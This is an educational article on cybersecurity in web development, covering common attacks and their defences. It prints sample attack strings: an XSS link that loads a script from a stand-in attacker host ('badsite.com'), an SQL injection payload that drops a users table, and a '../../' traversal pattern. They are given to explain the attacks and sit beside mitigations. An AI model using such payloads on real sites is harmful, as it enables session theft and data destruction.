In the present day, the Internet is often tagged an unsafe, and the only safe computer system is one without a network connection. In recent times, example during the ENDSARS protest We often hear rumors of organizations websites becoming unavailable due to denial-of-service attacks, or displaying modified (and often precarious or misinformation) information on their homepages. In other high-profile cases, millions of passwords, email addresses, and credit card details have been leaked into the public domain, exposing website users to both personal embarrassment and financial risk.
The purpose of cybersecurity application in web development is mainly to thwart these (or any) sorts of attacks. Cybersecurity application in web development can be defined as the application of acts or practices that will protect or shield web applications such as websites, enterprise resources management programs (ERPs) etc. from unauthorized access, use, modification, destruction, or disruption.
Efficient cybersecurity application requires design effort across the whole of the web application, from the configuration of the web server to the front and back end, your policies for creating and renewing passwords, and the client-side code. While all that sounds very threatening, a good notion is that if you’re using a well configured and up to date server-side web framework, it will aid and sometimes by default enable robust and well-thought-out defense mechanisms against a number of the more common attacks. Other attacks can be mitigated through your web server configuration, for example by enabling HTTPS. Finally, there are publicly available vulnerability scanner tools that can help you find out if you’ve made any obvious mistakes.
2.1 What is Cybersecurity
Cybersecurity is the protection of internet or intranet connected systems such as hardware, software and data from cyber related threats (Kaspersky, 2018). The practice is used by individuals and enterprises to protect against unauthorized access to data centers and other computerized systems.
The goal of implementing cybersecurity is often to provide a good security measures for computers, servers, networks, mobile devices and the data stored on these devices from attackers with malicious intent. Cyber-attacks can be designed to access, delete, or extort an organization’s or user’s sensitive data; making cybersecurity vital. Medical, government, corporate and financial organizations, may all hold vital personal information on an individual, for example.
Cybersecurity is a continuously changing field, with the development of technologies that open up new avenues for cyberattacks. Additionally, even though significant security breaches are the ones that often get publicized, small organizations still have to concern themselves with security breaches, as they may often be the target of viruses and phishing.
To protect organizations, employees and individuals, organizations and services should implement cybersecurity tools, training, risk management approaches and continually update systems as technologies change and evolve. (Techtarget, 2018).
2.2 Elements of cybersecurity
Ensuring cybersecurity requires the coordination of security efforts made throughout an information system, including:
- Application security
- Information security
- Network security
- Disaster recovery/business continuity planning
- Operational security
- End-user education
It can be a challenge in cybersecurity to keep up with the changing of security risks. The traditional approach has been to focus resources on crucial system components and protect against the biggest known threats, which meant leaving components undefended and not protecting systems against less dangerous risks.
To deal with the current environment, advisory organizations are promoting a more proactive and adaptive approach. The National Institute of Standards and Technology (NIST), for example, issued updated guidelines in its risk assessment framework that recommend a shift toward continuous monitoring and real-time assessments.
Version 1.1 of the Framework for Improving Critical Infrastructure was released in April 2018. The voluntary cybersecurity framework, developed for use in the banking, communications, defense and energy industries, can be adopted by all sectors, including federal and state governments. President Donald Trump issued an executive order mandating that federal agencies adopt the NIST Cybersecurity Framework (NIST CSF) in May 2017 (The White House, 2017).
As a result of security risks, investments in cybersecurity technologies and services are increasing. In the past, Gartner had predicted that worldwide spending on information security products and services would grow to $114 billion in 2018, and another 8.7% increase to $124 billion in 2019. Later, in 2019, Gartner had also predicted spending in enterprise security and risk management to grow 11% in 2020 regarding Middle East and North Africa.
2.3 Benefits of cybersecurity
Benefits of utilizing cybersecurity includes:
- Business protection against malware, ransomware, phishing and social engineering.
- Protection for data and networks.
- Prevention of unauthorized users.
- Improves recovery time after a breach.
- Protection for end-users.
- Improved confidence in the product for both developers and customers.
2.4 Cybersecurity Challenges
Cybersecurity is continually challenged by hackers, data loss, privacy, risk management, and changing cybersecurity strategies. Nothing currently indicates that cyber-attacks will decrease. Moreover, with the more entry points, there are for attacks, the more cybersecurity is needed to secure networks and devices.
One of the most problematic elements of cybersecurity is the continually evolving nature of security risks. As new technologies emerge, and technology is used in new or different ways, new avenues of attack are developed as well. Keeping up with these continual changes and advances in attacks can be challenging to organizations, as well as updating their practices to protect against them. This also includes ensuring that all the elements of cybersecurity are continually changed and updated to protect against potential vulnerabilities. This can be especially challenging for smaller organizations.
Additionally, today, there is a lot of potential data an organization can gather on individuals who take part in one of their services. With more data being collected, the likelihood of a cybercriminal who wants to steal personally identifiable information is another concern. For example, an organization that stores personally identifiable information in the cloud may be subject to a ransomware attack, and should do what they can to prevent a cloud breach.
Cybersecurity should also address end-user education, as an employee may accidently bring a virus into a workplace on their work computer, laptop, or smartphone.
Another large challenge to cybersecurity includes a job shortage. As growth in data from businesses become more important, the need for more cybersecurity personnel to analyze, manage and respond to incidents increases. It is estimated that there are two million unfilled cybersecurity jobs worldwide. Cybersecurity ventures also estimates that by 2021, there will be up to 3.5 million unfilled cybersecurity jobs.
However, new advances in machine learning and artificial intelligence (AI) have started to be developed to help in organizing and managing data — although not to the effect needed.
2.5 Web Development
Web development is the work involved in developing a web site for the Internet (World Wide Web) or an intranet (a private network). It is also referred to as the coding or programming that enables website functionality, per the owner’s requirements. It mainly deals with the non-design aspect of building websites, which includes coding and writing markup.
Web development ranges from creating plain text pages to complex web-based applications, social network applications and electronic business applications. and social network services. A more comprehensive list of tasks to which Web development commonly refers, may include Web engineering, Web design, Web content development, client liaison, client-side/server-side scripting, Web server and network security configuration, and e-commerce development.
The web development hierarchy is as follows:
- Client-side coding.
- Server-side coding.
- Database technology.
Among web professionals, “Web development” usually refers to the main non-design aspects of building Web sites: writing markup and coding.
For larger organizations and businesses, Web development teams can consist of hundreds of people (Web developers) and follow standard methods like Agile methodologies while developing Web sites. Smaller organizations may only require a single permanent or contracting developer, or secondary assignment to related job positions such as a graphic designer or information systems technician. Web development may be a collaborative effort between departments rather than the domain of a designated department. There are three kinds of Web developer specialization: front-end developer, back-end developer, and full-stack developer. Front-end developers are responsible for behavior and visuals that run in the user browser, while back-end developers deal with the servers.
2.6 Web Development and Cybersecurity
Cybersecurity continues to be an evolving challenge for website designers and developers. Every day, hackers create new malware strains and perform sophisticated attacks that can devastate client websites. As a web designer or developer, it is imperative that you understand your role in the security of your clients’ websites. Many people assume that you are handling every aspect of the site, including its protection. Because of this, you must take action and understand how to provide that security.
Web design and development can be lucrative careers; however, it comes with a great deal of risk and uncertainty. Customers rely on designers and developers to not only design a beautiful and functional website, but also to protect it. Unfortunately, this means that as a designer or developer, you may be held responsible, fair or not, for damages caused by hackers on websites that you created.
When Alpine Bank was breached in 2015, the web developer was held responsible for more than $150,000 in damages. According to court documents, the web developer did not maintain the website, install basic anti-malware software, install critical software patches, or encrypt customer information.
In another case, a web development and hosting company, Graphics Online, in Australia was forced to liquidate their entire business. The company had incurred over $100,000 in costs to remediate damage from cyberattacks and purchase software to further protect itself and its customers. Unfortunately, the developer was unable to recover the costs and had to refer customers to other providers.
3.0 Application of Cybersecurity in Web Development
From conceptual ideation of a web development project, cybersecurity measures are integrated at every stage of development to forestall any security flaw that may arise leading to breakage or a loop hole that may be exploited when the project is deployed in the production stage of the project. Cybersecurity measures tends to identify known vulnerabilities and as well as any wrong or poor coding methodologies or zero-day attacks.
3.1 Top Cybersecurity Risks Considered During Web Development
Improvement of the security of a web application is a non-negotiable part of web development, as hackers consistently deploy new methods to find a loophole and breach the system. Therefore, maintaining the Cyber Security is important. Top of the cybersecurity methods applied during web developments are done to curtail the following attacks.
3.1.1 Cross-Site Scripting Vulnerability (XSS)
XSS vulnerabilities are exploited to send malicious code to an unsuspecting user. According to OWASP, XSS attacks are a type of injection in which malicious scripts are injected into trusted websites. When customers visit these websites or web applications, the malicious code can access sensitive information that is shared by the user with the website. This information can then be used to hijack user sessions or to deface the response gotten by the user from the web server;
Furthermore, can also be described as a class of cyber-attack that allows the attacker to inject client-side scripts through the website into the browsers of other users. Because the injected code comes to the browser from the site, the code is trusted and can do things like send the user’s site authorization cookie to the attacker. When the attacker has the cookie, they can log into a site as though they were the user and do anything the user can, such as access their credit card details, see contact details, or change passwords of web application users. (“Website security”, 2020).
The XSS vulnerabilities can be divided into two, they are reflected and persistent, based on how the site returns the injected scripts to a browser.
- A reflected XSS vulnerability occurs when user content that is passed to the server is returned immediately and unmodified for display in the browser. Any scripts in the original user content will be run when the new page is loaded.
For example, consider a site search function where the search terms are encoded as URL parameters, and these terms are displayed along with the results. An attacker can construct a search link that contains a malicious script as a parameter (e.g., http://mysite.com?q=beer<script%20src=”http://badsite.com/tricky.js”></script>) and email it to another user. If the target user clicks this “interesting link”, the script will be executed when the search results are displayed. As discussed earlier, this gives the attacker all the information they need to enter the site as the target user, potentially making purchases as the user or sharing their contact information.
- A persistent XSS vulnerability occurs when the malicious script is stored on the website and then later redisplayed unmodified for other users to execute unwittingly.
For example, a discussion board that accepts comments that contain unmodified HTML could store a malicious script from an attacker. When the comments are displayed, the script is executed and can send to the attacker the information required to access the user’s account. This sort of attack is extremely popular and powerful, because the attacker might not even have any direct engagement with the victims.
3.1.2 SQL Injection Vulnerability
SQL injection occurs when attackers insert or “inject” input data into a website allowing them access to an entire website database. (Ed Pollack, 2019). This includes reading sensitive data, modifying or deleting website files and corrupting the website itself. For website owners, this can result in stolen and/or sold customer and visitor information. The website could also be shut down entirely.
These vulnerabilities lie in the website code and can be patched by developers who know where to look for them. However, this requires constant monitoring. Using tools that automatically identify these vulnerabilities can dramatically improve the timeline for fixing the issue and reducing damage.
More so, SQL injection vulnerabilities enable malicious users to execute arbitrary SQL code on a database, allowing data to be accessed, modified, or deleted irrespective of the user’s permissions. A successful injection attack might spoof identities, create new identities with administration rights, access all data on the server, or destroy/modify the data to make it unusable.
SQL injection types include Error-based SQL injection, SQL injection based on boolean errors, and Time-based SQL injection.
This vulnerability is present if user input that is passed to an underlying SQL statement can change the meaning of the statement. For example, the following code is intended to list all users with a particular name (userName) that has been supplied from an HTML form:
statement = “SELECT * FROM users WHERE name = ‘” + userName + “‘;”
If the user specifies a real name, the statement will work as intended. However, a malicious user could completely change the behavior of this SQL statement to the new statement in the following example, by simply specifying the text in bold for the userName.
SELECT * FROM users WHERE name = ‘a’;DROP TABLE users; SELECT * FROM userinfo WHERE ‘t’ = ‘t‘;
The modified statement creates a valid SQL statement that deletes the users table and selects all data from the userinfo table (which reveals the information of every user). This works because the first part of the injected text (a’;) completes the original statement.
To avoid this sort of attack, you must ensure that any user data that is passed to an SQL query cannot change the nature of the query. One way to do this is to escape all the characters in the user input that have a special meaning in SQL.
3.1.3 Cross-Site Request Forgery (CSRF)
CSRF attacks allow a malicious user to execute actions using the credentials of another user without that user’s knowledge or consent.
This type of attack is best explained by example. John is a malicious user who knows that a particular site allows logged-in users to send money to a specified account using an HTTP POST request that includes the account name and an amount of money. John constructs a form that includes his bank details and an amount of money as hidden fields, and emails it to other site users (with the Submit button disguised as a link to a “get rich quick” site).
If a user clicks the submit button, an HTTP POST request will be sent to the server containing the transaction details and any client-side cookies that the browser associated with the site (adding associated site cookies to requests is normal browser behavior). The server will check the cookies, and use them to determine whether or not the user is logged in and has permission to make the transaction.
The result is that any user who clicks the Submit button while they are logged in to the trading site will make the transaction. John gets rich.
One way to prevent this type of attack is for the server to require that POST requests include a user-specific site-generated secret. The secret would be supplied by the server when sending the web form used to make transfers. This approach prevents John from creating his own form, because he would have to know the secret that the server is providing for the user. Even if he found out the secret and created a form for a particular user, he would no longer be able to use that same form to attack every user. Web frameworks such as Django often include such CSRF prevention mechanisms.
Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages (Robert McMillan, 2008). In this attack, a malicious user hijacks clicks meant for a visible top-level site and routes them to a hidden page beneath. This technique might be used, for example, to display a legitimate bank site but capture the login credentials into an invisible <iframe> controlled by the attacker. Clickjacking could also be used to get the user to click a button on a visible site, but in doing so actually unwittingly click a completely different button. As a defense, your site can prevent itself from being embedded in an iframe in another site by setting the appropriate HTTP headers.
3.1.5 Denial of Service (DoS)
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users. (“Palo Alto Networks”, 2020). DoS is usually achieved by flooding a target site with fake requests so that access to a site is disrupted for legitimate users. The requests may simply be numerous, or they may individually consume large amounts of resource (e.g., slow reads or uploading of large files). DoS defenses usually work by identifying and blocking “bad” traffic while allowing legitimate messages through. These defenses are typically located before or in the web server (they are not part of the web application itself).
3.1.6 Directory Traversal (File and disclosure).
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application (“Web Security Academy”, 2020); In this attack, a malicious user attempts to access parts of the web server file system that they should not be able to access. This vulnerability occurs when the user is able to pass filenames that include file system navigation characters (for example, ../../). The solution is to sanitize input before using it.
3.1.7 File Inclusion.
In this attack, a user is able to specify an “unintended” file for display or execution in data passed to the server. When loaded, this file might be executed on the web server or the client-side (leading to an XSS attack). The solution is to sanitize input before using it.
3.1.8 Command Injection.
Command injection attacks allow a malicious user to execute arbitrary system commands on the host operating system. The solution is to sanitize user input before it might be used in system calls.
3.2 Key Cybersecurity Measures to Curtail Attacks
A number of other concrete steps you can take are:
- Use more effective password management. Encourage strong passwords that are changed regularly. Consider two-factor authentication for your site, so that in addition to a password the user must enter another authentication code (usually one that is delivered via some physical hardware that only the user will have, such as a code in an SMS sent to their phone).
- Configure your web server to use HTTPS and HTTP Strict Transport Security (HSTS). HTTPS encrypts data sent between your client and server. This ensures that login credentials, cookies, POST requests data and header information are not easily available to attackers.
- Keep track of the most popular threats (the current OWASP list is here) and address the most common vulnerabilities first.
- Use vulnerability scanning tools to perform automated security testing on your site. Later on, your very successful website may also find bugs by offering a bug bounty like Mozilla does here.
- Only store and display data that you need. For example, if your users must store sensitive information like credit card details, only display enough of the card number that it can be identified by the user, and not enough that it can be copied by an attacker and used on another site. The most common pattern at this time is to only display the last 4 digits of a credit card number.
Web frameworks such as Django, Node.js, Lavarel etc. can help mitigate many of the more common vulnerabilities.
Hackers attack web application to steal sensitive online data, blackmail people and steal money, create chaos in the society and ruin the company’s reputation. Cybercrime can cause huge damage to the company, from the economy to products and the customers. Therefore, it is very imperative that web developers integrate or consider cyber security at every stage of web development and deployment, which if ignored can throw hours of labour into the refuse bin and as well cause severe financial or reputation loss.
Written by Peace Onwuka
Kaspersky.com. (2020). What is Cyber Security? Retrieved 6 December 2020, from https://www.kaspersky.com/resource-center/definitions/what-is-cyber-security.
Mozilla.org (2020). Website security – MDN Web Docs. Retrieved 6 December 2020, from https://developer.mozilla.org/en-US/docs/Learn/Server-side/First_steps/Website_security.
Palo Alto Networks. (2020). What is a denial of service attack (DoS)? Retrieved 6 December 2020, from https://www.paloaltonetworks.com/cyberpedia/what-is-a-denial-of-service-attack-dos#:~:text=A%20Denial%2Dof%2DService%20(,information%20that%20triggers%20a%20crash.
Portswigger.net. (2020). What is directory traversal, and how to prevent it? | Web Security Academy. Retrieved 6 December 2020, from https://portswigger.net/web-security/file-path-traversal.
Pollack, E. (2020). SQL Injection: What is it? Causes and exploits. SQL Shack – articles about database auditing, server performance, data recovery, and more. Retrieved 6 December 2020, from https://www.sqlshack.com/sql-injection-what-is-it-causes-and-exploits/.
Robert McMillan (17 September 2008). At Adobe’s request, hackers nix ‘clickjacking’ talk
Retrieved 8 October 2008 from https://www.pcworld.idg.com.au/article/260609/adobe_request_hackers_nix_clickjacking_talk/
Search Security. (2020). What is Cybersecurity? Everything You Need to Know. Retrieved 6 December 2020, from https://searchsecurity.techtarget.com/definition/cybersecurity.
Techopedia.com. (2020). What is Web Development? – Definition from Techopedia. Retrieved 6 December 2020, from https://www.techopedia.com/definition/23889/web-development.
The White House. (2019). Presidential Executive Order on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure | The White House. Retrieved 6 December 2020, from https://www.whitehouse.gov/presidential-actions/presidential-executive-order-strengthening-cybersecurity-federal-networks-critical-infrastructure/